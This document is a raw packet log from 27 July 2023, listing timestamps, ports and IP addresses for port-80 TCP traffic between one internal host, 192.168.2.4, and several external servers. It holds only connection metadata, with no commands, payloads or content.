Jul 27, 2023 20:19:29.659799099 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659806967 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.659837961 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.659961939 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660012007 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660029888 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660048962 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660063982 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.660104990 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.660537004 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660557985 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660574913 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660619974 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.660655975 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660672903 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.660685062 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.660733938 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.667190075 CEST	49806	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:29.689846992 CEST	80	49805	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.691333055 CEST	80	49805	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.691405058 CEST	49805	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.712203979 CEST	80	49806	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:29.714071989 CEST	49806	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:29.716622114 CEST	49806	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:29.716676950 CEST	49806	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:29.761320114 CEST	80	49806	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:29.808290005 CEST	49805	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.809084892 CEST	49807	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.840212107 CEST	80	49805	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.840437889 CEST	49805	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.840440989 CEST	80	49807	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.840547085 CEST	49807	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.845145941 CEST	49807	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.876729012 CEST	80	49807	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.877408981 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.878151894 CEST	80	49807	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.880455017 CEST	49807	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.881488085 CEST	80	49797	200.114.247.163	192.168.2.4
Jul 27, 2023 20:19:29.916635036 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:29.916687965 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:29.917442083 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.917490959 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.917534113 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.917582035 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.917617083 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.917685986 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.918118000 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.918168068 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.918189049 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.918246984 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.918292999 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.918294907 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.918339014 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.918384075 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.918391943 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.918431044 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.918490887 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.919245958 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919294119 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919338942 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919369936 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.919385910 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919431925 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919440031 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.919476032 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919521093 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919524908 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.919567108 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919612885 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919661045 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.919785976 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919831991 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919878960 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919891119 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.919924974 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.919930935 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.919970036 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.920039892 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.920077085 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.920157909 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.920201063 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.920217037 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.923190117 CEST	80	49806	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:29.923228979 CEST	80	49806	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:29.923331022 CEST	49806	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:29.923392057 CEST	49806	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:29.925178051 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925230026 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925272942 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925308943 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.925318003 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925349951 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.925364971 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925410986 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.925648928 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925695896 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925741911 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925750971 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.925786972 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925831079 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.925838947 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.926100016 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926148891 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926192999 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926198006 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.926239014 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926287889 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.926620960 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926667929 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926678896 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.926717043 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926760912 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.926762104 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926806927 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.926855087 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.927160025 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927206039 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927249908 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927295923 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927301884 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.927666903 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927736998 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.927737951 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927778959 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927828074 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927845955 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.927874088 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.927927017 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.928184986 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.928230047 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.928242922 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.928297043 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.928380966 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.928407907 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.928425074 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.928459883 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.928507090 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.929430008 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.929627895 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:29.968120098 CEST	80	49806	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:29.997229099 CEST	49807	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.997953892 CEST	49808	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.029218912 CEST	80	49807	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:30.029700994 CEST	80	49808	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:30.029825926 CEST	49807	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.029867887 CEST	49808	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.032843113 CEST	49808	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.064790964 CEST	80	49808	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:30.066946030 CEST	80	49808	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:30.067065001 CEST	49808	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.068150997 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.068197966 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.084498882 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.084559917 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.120136976 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:30.168828964 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.168875933 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.168979883 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.173401117 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.173444986 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.185017109 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:30.189575911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.189630985 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.190412045 CEST	49808	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.191096067 CEST	49809	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.204436064 CEST	49810	80	192.168.2.4	190.224.203.37
Jul 27, 2023 20:19:30.222161055 CEST	80	49808	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:30.222426891 CEST	80	49809	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:30.222517967 CEST	49808	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.222559929 CEST	49809	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.227130890 CEST	49809	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.258598089 CEST	80	49809	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:30.260246038 CEST	80	49809	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:30.260391951 CEST	49809	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:30.280355930 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280430079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280478001 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280519009 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.280528069 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280576944 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280582905 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.280625105 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280664921 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.280670881 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280719042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280765057 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280808926 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.280811071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280881882 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.280904055 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.280924082 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.282509089 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314115047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314153910 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314181089 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314208984 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314229965 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314232111 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314260006 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314284086 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314286947 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314308882 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314312935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314338923 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314357042 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314366102 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314390898 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314416885 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314433098 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314443111 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314460993 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314470053 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314490080 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314513922 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314532995 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314539909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314562082 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314630032 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314657927 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314677954 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314723015 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314729929 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314735889 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314754963 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314780951 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314805031 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314810991 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.314826965 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.314843893 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.349880934 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.349922895 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.349947929 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.349957943 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.349972963 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.349997997 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.350023031 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.350033998 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.350049973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.350075006 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.350100040 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.350121021 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.350120068 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.350136042 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.350158930 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352487087 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352519989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352550030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352552891 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352576017 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352600098 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352601051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352627039 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352644920 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352652073 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352679014 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352706909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352719069 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352732897 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352756023 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352757931 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352783918 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352802992 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352808952 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352833986 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352858067 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352881908 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352881908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352907896 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352924109 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352932930 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352953911 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.352961063 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.352988005 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353003979 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353012085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353038073 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353061914 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353084087 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353085041 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353110075 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353111029 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353132010 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353153944 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353157043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353183031 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353205919 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353230953 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353235006 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353255987 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353255987 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353280067 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353302002 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353303909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353327990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353352070 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353377104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353383064 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353398085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.353401899 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.353446007 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.385644913 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385670900 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385688066 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385703087 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385723114 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385739088 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385757923 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385777950 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385793924 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.385797977 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385817051 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385827065 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.385833979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385848045 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385859966 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.385860920 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385874033 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385886908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385902882 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385921001 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385940075 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385951996 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.385957956 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385976076 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.385986090 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.385994911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386012077 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386029959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386049032 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386050940 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386070013 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386080980 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386085987 CEST	80	49770	188.114.96.7	192.168.2.4
